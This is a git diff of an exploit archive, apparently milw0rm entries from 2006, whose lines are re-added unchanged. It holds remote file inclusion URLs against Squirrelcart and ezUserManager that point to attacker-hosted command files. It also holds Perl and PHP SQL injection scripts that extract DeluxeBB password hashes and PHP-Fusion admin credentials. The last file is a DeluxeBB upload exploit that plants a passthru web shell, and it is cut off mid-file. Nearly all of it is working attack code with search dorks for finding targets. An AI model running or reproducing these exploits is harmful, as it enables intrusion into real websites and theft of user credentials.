@@ -1,9 +1,9 @@ -Title : Squirrelcart <= 2.2.0 Remote File Inclusion -URL : http://www.ldev.com/ -google Dork : inurl:/squirrelcart/ -Author : OLiBekaS -greetz : Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew - -Exploit : /cart_content.php?cart_isp_root=http://yourhost/cmd.gif?cmd=ls - -# milw0rm.com [2006-05-15] +Title : Squirrelcart <= 2.2.0 Remote File Inclusion +URL : http://www.ldev.com/ +google Dork : inurl:/squirrelcart/ +Author : OLiBekaS +greetz : Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew + +Exploit : /cart_content.php?cart_isp_root=http://yourhost/cmd.gif?cmd=ls + +# milw0rm.com [2006-05-15] diff --git a/platforms/php/webapps/1793.pl b/platforms/php/webapps/1793.pl index 5bc850b72..a822f856b 100755 --- a/platforms/php/webapps/1793.pl +++ b/platforms/php/webapps/1793.pl 
@@ -1,79 +1,79 @@ -#!/usr/bin/perl - -use IO::Socket; - - -print q{ -############################################# -# DeluxeBB 1.06 Remote SQL Injection Exploit# -# exploit discovered and coded # -# by KingOfSka # -# http://contropotere.netsons.org # -############################################# -}; - -if (!$ARGV[2]) { - -print q{ - Usage: perl dbbxpl.pl host /directory/ victim_userid - - perl dbbxpl.pl www.somesite.com /forum/ 1 - - -}; - -} - - -$server = $ARGV[0]; -$dir = $ARGV[1]; -$user = $ARGV[2]; -$myuser = $ARGV[3]; -$mypass = $ARGV[4]; -$myid = $ARGV[5]; - -print "------------------------------------------------------------------------------------------------\r\n"; -print "[>] SERVER: $server\r\n"; -print "[>] DIR: $dir\r\n"; -print "[>] USERID: $user\r\n"; -print "------------------------------------------------------------------------------------------------\r\n\r\n"; - -$server =~ s/(http:\/\/)//eg; - -$path = $dir; -$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ; - - -print "[~] PREPARE TO CONNECT...\r\n"; - -$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; - -print "[+] CONNECTED\r\n"; -print "[~] SENDING QUERY...\r\n"; -print $socket "GET $path HTTP/1.1\r\n"; -print $socket "Host: $server\r\n"; -print $socket "Accept: */*\r\n"; -print $socket "Connection: close\r\n\r\n"; -print "[+] DONE!\r\n\r\n"; - - - -print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; -while ($answer = <$socket>) -{ - - if ($answer =~/(\w{32})/) -{ - - if ($1 ne 0) { - print "Password Hash is: ".$1."\r\n"; -print "--------------------------------------------------------------------------------------\r\n"; - - } -exit(); -} - -} -print "------------------------------------------------------------------------------------------------\r\n"; - 
-# milw0rm.com [2006-05-15] +#!/usr/bin/perl + +use IO::Socket; + + +print q{ +############################################# +# DeluxeBB 1.06 Remote SQL Injection Exploit# +# exploit discovered and coded # +# by KingOfSka # +# http://contropotere.netsons.org # +############################################# +}; + +if (!$ARGV[2]) { + +print q{ + Usage: perl dbbxpl.pl host /directory/ victim_userid + + perl dbbxpl.pl www.somesite.com /forum/ 1 + + +}; + +} + + +$server = $ARGV[0]; +$dir = $ARGV[1]; +$user = $ARGV[2]; +$myuser = $ARGV[3]; +$mypass = $ARGV[4]; +$myid = $ARGV[5]; + +print "------------------------------------------------------------------------------------------------\r\n"; +print "[>] SERVER: $server\r\n"; +print "[>] DIR: $dir\r\n"; +print "[>] USERID: $user\r\n"; +print "------------------------------------------------------------------------------------------------\r\n\r\n"; + +$server =~ s/(http:\/\/)//eg; + +$path = $dir; +$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ; + + +print "[~] PREPARE TO CONNECT...\r\n"; + +$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; + +print "[+] CONNECTED\r\n"; +print "[~] SENDING QUERY...\r\n"; +print $socket "GET $path HTTP/1.1\r\n"; +print $socket "Host: $server\r\n"; +print $socket "Accept: */*\r\n"; +print $socket "Connection: close\r\n\r\n"; +print "[+] DONE!\r\n\r\n"; + + + +print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; +while ($answer = <$socket>) +{ + + if ($answer =~/(\w{32})/) +{ + + if ($1 ne 0) { + print "Password Hash is: ".$1."\r\n"; +print "--------------------------------------------------------------------------------------\r\n"; + + } +exit(); +} + +} +print 
"------------------------------------------------------------------------------------------------\r\n"; + +# milw0rm.com [2006-05-15] diff --git a/platforms/php/webapps/1795.txt b/platforms/php/webapps/1795.txt index cc71955b1..d1cf10e4b 100755 --- a/platforms/php/webapps/1795.txt +++ b/platforms/php/webapps/1795.txt @@ -1,15 +1,15 @@ -Title : ezUserManager <= v1.6 Remote File Inclusion Vulnerability -- -URL : http://www.ezusermanager.com/ -- -Dork : "powered by ezUserManager" -- -Author : OLiBekaS -- -contact : olibekas[at]gmail.com -- -greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew -- -Exploit : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls - -# milw0rm.com [2006-05-15] +Title : ezUserManager <= v1.6 Remote File Inclusion Vulnerability +- +URL : http://www.ezusermanager.com/ +- +Dork : "powered by ezUserManager" +- +Author : OLiBekaS +- +contact : olibekas[at]gmail.com +- +greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew +- +Exploit : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls + +# milw0rm.com [2006-05-15] diff --git a/platforms/php/webapps/1796.php b/platforms/php/webapps/1796.php index ca0865590..7ad621aa1 100755 --- a/platforms/php/webapps/1796.php +++ b/platforms/php/webapps/1796.php 
@@ -1,152 +1,152 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "PHP-Fusion <= v6.00.306 \"srch_where\" SQL Injection/Admin credentials disclosure\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; - -if ($argc<5) { -echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to PHP-Fusion\r\n"; -echo "user/pass: you need an account\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Example:\r\n"; -echo "php ".$argv[0]." localhost /fusion/ username password\r\n"; -die; -} -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$user=$argv[3]; -$pass=$argv[4]; -$port=80; -$proxy=""; -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "step 1 -> login...\r\n"; -$data ="user_name=".urlencode(trim($user)); -$data.="&user_pass=".urlencode(trim($pass)); -$data.="&login=Login"; -$packet="POST ".$p."news.php HTTP/1.0\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; -$packet.="Referer: http://".$host.$path."news.php\r\n"; -$packet.="Accept-Language: en\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Keep-Alive\r\n"; -$packet.="Cache-Control: no-cache\r\n"; -$packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -$temp=explode("Set-Cookie: ",$html); -$temp2=explode(' ',$temp[1]); -$cookie=$temp2[0]; -echo 'Your cookie -> '.$cookie."\r\n\r\n"; -if ($cookie=='') {die("Unable to login...");} - -echo "step 2 -> inject some code in srch_where argument...\r\n"; -$sql="999999 UNION SELECT 
0,0,0,user_name,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*"; -$sql=urlencode($sql); -$packet ="GET ".$p."messages.php?folder=inbox&show=_&srch_where=".$sql." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: ".$cookie."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -$temp=explode("messages.php?msg_view=",$html); -$temp2=explode(">",$temp[1]); -$temp=explode("<",$temp2[1]); -$admin=$temp[0]; -echo "admin: ".$admin."\r\n"; - -$sql="999999 UNION SELECT 0,0,0,user_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*"; -$sql=urlencode($sql); -$packet ="GET ".$p."messages.php?folder=inbox&show=_&srch_where=".$sql." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: ".$cookie."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -$temp=explode("messages.php?msg_view=",$html); -$temp2=explode(">",$temp[1]); -$temp=explode("<",$temp2[1]); -$hash=$temp[0]; -echo "hash: ".$hash."\r\n"; -?> - -# milw0rm.com [2006-05-16] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "PHP-Fusion <= v6.00.306 \"srch_where\" SQL Injection/Admin credentials disclosure\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; + +if ($argc<5) { +echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to PHP-Fusion\r\n"; +echo "user/pass: you need an account\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Example:\r\n"; +echo "php ".$argv[0]." 
localhost /fusion/ username password\r\n"; +die; +} +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$user=$argv[3]; +$pass=$argv[4]; +$port=80; +$proxy=""; +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "step 1 -> login...\r\n"; +$data ="user_name=".urlencode(trim($user)); +$data.="&user_pass=".urlencode(trim($pass)); +$data.="&login=Login"; +$packet="POST ".$p."news.php HTTP/1.0\r\n"; +$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; +$packet.="Referer: http://".$host.$path."news.php\r\n"; +$packet.="Accept-Language: en\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Keep-Alive\r\n"; +$packet.="Cache-Control: no-cache\r\n"; +$packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +$temp=explode("Set-Cookie: ",$html); +$temp2=explode(' ',$temp[1]); +$cookie=$temp2[0]; +echo 'Your cookie -> '.$cookie."\r\n\r\n"; +if ($cookie=='') {die("Unable to login...");} + +echo "step 2 -> inject some code in srch_where argument...\r\n"; +$sql="999999 UNION SELECT 0,0,0,user_name,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*"; +$sql=urlencode($sql); +$packet ="GET ".$p."messages.php?folder=inbox&show=_&srch_where=".$sql." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: ".$cookie."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +$temp=explode("messages.php?msg_view=",$html); +$temp2=explode(">",$temp[1]); +$temp=explode("<",$temp2[1]); +$admin=$temp[0]; +echo "admin: ".$admin."\r\n"; + +$sql="999999 UNION SELECT 0,0,0,user_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*"; +$sql=urlencode($sql); +$packet ="GET ".$p."messages.php?folder=inbox&show=_&srch_where=".$sql." 
HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: ".$cookie."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +$temp=explode("messages.php?msg_view=",$html); +$temp2=explode(">",$temp[1]); +$temp=explode("<",$temp2[1]); +$hash=$temp[0]; +echo "hash: ".$hash."\r\n"; +?> + +# milw0rm.com [2006-05-16] diff --git a/platforms/php/webapps/1797.php b/platforms/php/webapps/1797.php index ddd4d33a9..40b0e1b52 100755 --- a/platforms/php/webapps/1797.php +++ b/platforms/php/webapps/1797.php 
@@ -1,317 +1,317 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "DeluxeBB <= v1.06 attachment mod_mime exploit\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n"; -echo "tested & working against a fresh deluxebb installation\r\n\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to deluxebb\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /deluxebb/ cat ./../settings/info.php\r\n"; -echo "php ".$argv[0]." localhost /deluxebb/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n\r\n"; -die; -} - -/*explaination: - - you can upload attachments with double extensions, ex.: - - test.php.php.rar - - file is renamed like this: - - test.php.php-1147772503.ext - - and copied to the files/ folder, as you can see, new filename is predictable..., - numbers are the result of time() php function, you have just to synchronize - clocks through Apache "Date" header... 
- - It seems that Apache mod_mime module considers double-extension files like - this to be valid PHP files and runs the arbitrary code that has been uploaded, - actually on most versions you can do somethign like this: - - http://[target]/[path]/files/test.php.php-1147772503.ext?cmd=ls%20-la - */ -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - -function greenwich_timestamp($response) -{ - $temp=explode("Date: ",$response); - $temp2=explode("\r\n",$temp[1]); - $is_now=$temp2[0]; - $temp=explode(" ",$is_now);$day=$temp[1];$month=$temp[2];$year=$temp[3];$temp2=explode(":",$temp[4]); - $hour=$temp2[0];$min=$temp2[1];$sec=$temp2[2]; - $tb=array ('Jan', '1','Feb', '2','Mar', '3','Apr', '4','May', '5','Jun', '6', - 'Jul', '7','Aug', '8','Sep', '9','Oct', '10','Nov', '11','Dec', '12'); - for ($i=0;$i<=23;$i++) {if ($month==$tb[$i]) {$month=$tb[$i+1];break;}} - return mktime($hour,$min,$sec,$month,$day,$year); -} - -function gmtime() { // Get GM offset. - return time() - (int) date('Z'); -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "step 0 -> Check if suntzu.php is already installed\r\n"; -$packet ="GET ".$p."files/suntzu.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cmd=".$cmd.";\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (strstr($html,"56789")) -{ - echo "Exploit succeeded..."; - $temp=explode("56789",$html); - die("\r\n".$temp[1]."\r\n"); -} - -echo "step 0b -> Synchronize...\r\n"; -$difftime=0; -//Unin epoch time by Apache "Date:" response header -//it carries GMT time... sending HEAD request -$packet ="HEAD / HTTP/1.1\r\nHost: ".$host."\r\nConnection: Close\r\n\r\n"; -sendpacketii($packet); -if ((eregi("Date: ",$html)) and ($proxy=='')) -{ -$itstime=greenwich_timestamp($html); -echo "target host Greenwich timestamp: ".$itstime."\r\n"; -$mytime=gmtime(); -echo "my greenwich timestamp: ".$mytime."\r\n"; -$difftime= $itstime-$mytime; -echo "difftime: ".$difftime."\r\n"; -} -else -{ -echo "Unable to read \"Date\", assuming difftime = 0\r\n"; -} - -echo "step 1 -> Register...\r\n"; -srand(make_seed()); -$anumber = rand(1,99999); -$data="name=suntzu".$anumber; -$data.="&pass=suntzu"; -$data.="&pass2=suntzu"; -$data.="&email=suntzu".$anumber."%40fakemail.com"; -$data.="&hideemail=1"; -$data.="&languagex=English"; -$data.="&xthetimeoffset=2"; -$data.="&xthedateformat=d-m-Y"; -$data.="&xthetimeformat=24"; -$data.="&submit=Register"; -$packet ="POST ".$p."misc.php?sub=register HTTP/1.0\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -$temp=explode("Set-Cookie: ",$html); -$cookie=""; -for ($i=1; $i<=count($temp)-1; $i++) -{ -$temp2=explode(" ",$temp[$i]); -$cookie.=" ".$temp2[0]; -} -if ($cookie=='') { - die("Unable 
to register..."); - } -else { - echo "cookie -> ".$cookie."\r\n"; - } - -echo "step 2 -> Post a new thread with the evil attachment...\r\n"; - -$attachment=' -<?php -$fp=fopen("suntzu.php","w"); -fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>"); -fclose($fp); -chmod("suntzu.php",777); -?>'; - -$data='-----------------------------7d6ee3a7074a -Content-Disposition: form-data; name="subject" - -Sun-Tzu, Art of War ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="posticon" - -None ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="disablesmilies" - -1 ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="fileupload"; filename="suntzu'.$anumber.'.php.php.rar" -Content-Type: application/octet-stream - -'.$attachment.' ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="MAX_FILE_SIZE" - -1048576 ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="what" - -ciao ------------------------------7d6ee3a7074a -Content-Disposition: form-data; name="submit" - -Post ------------------------------7d6ee3a7074a-- -'; - -$packet ="POST ".$p."newpost.php?sub=newthread&fid=1 HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Cookie: ".$cookie."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -$mytime=time() + $difftime; -sendpacketii($packet); -sleep(2); - -/* -file is renamed in this way: - -... -$time = time(); //header.php, line 78 -... - -... -$saveit = $settings['attachdir'] . $filename . '-' . $time . '.' . 
'ext'; //newpost.php, line 218-219 -copy($fileupload['tmp_name'], $saveit); -... */ - -$predict_time= - array ( - $mytime, - $mytime + 1, - $mytime + 2, - $mytime + 3, - $mytime + 4, - $mytime + 5, - $mytime + 6 - ); - -for ($i=0; $i<=count($predict_time)-1; $i++) -{ - $a=3+$i; - echo "step ".$a." -> trying with suntzu".$anumber.".php.php-".$predict_time[$i].".ext\r\n"; - $packet ="GET ".$p."files/suntzu".$anumber.".php.php-".$predict_time[$i].".ext HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - sendpacketii($packet); - - $packet ="GET ".$p."files/suntzu.php HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Cookie: cmd=".$cmd.";\r\n"; - $packet.="Connection: Close\r\n\r\n"; - sendpacketii($packet); - if (strstr($html,"56789")) - { - echo "Exploit succeeded..."; - $temp=explode("56789",$html); - die("\r\n".$temp[1]."\r\n"); - } -} -//if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-05-16] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "DeluxeBB <= v1.06 attachment mod_mime exploit\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n"; +echo "tested & working against a fresh deluxebb installation\r\n\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to deluxebb\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /deluxebb/ cat ./../settings/info.php\r\n"; +echo "php ".$argv[0]." localhost /deluxebb/ ls -la -p81\r\n"; +echo "php ".$argv[0]." 
localhost / ls -la -P1.1.1.1:80\r\n\r\n"; +die; +} + +/*explaination: + + you can upload attachments with double extensions, ex.: + + test.php.php.rar + + file is renamed like this: + + test.php.php-1147772503.ext + + and copied to the files/ folder, as you can see, new filename is predictable..., + numbers are the result of time() php function, you have just to synchronize + clocks through Apache "Date" header... + + It seems that Apache mod_mime module considers double-extension files like + this to be valid PHP files and runs the arbitrary code that has been uploaded, + actually on most versions you can do somethign like this: + + http://[target]/[path]/files/test.php.php-1147772503.ext?cmd=ls%20-la + */ +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
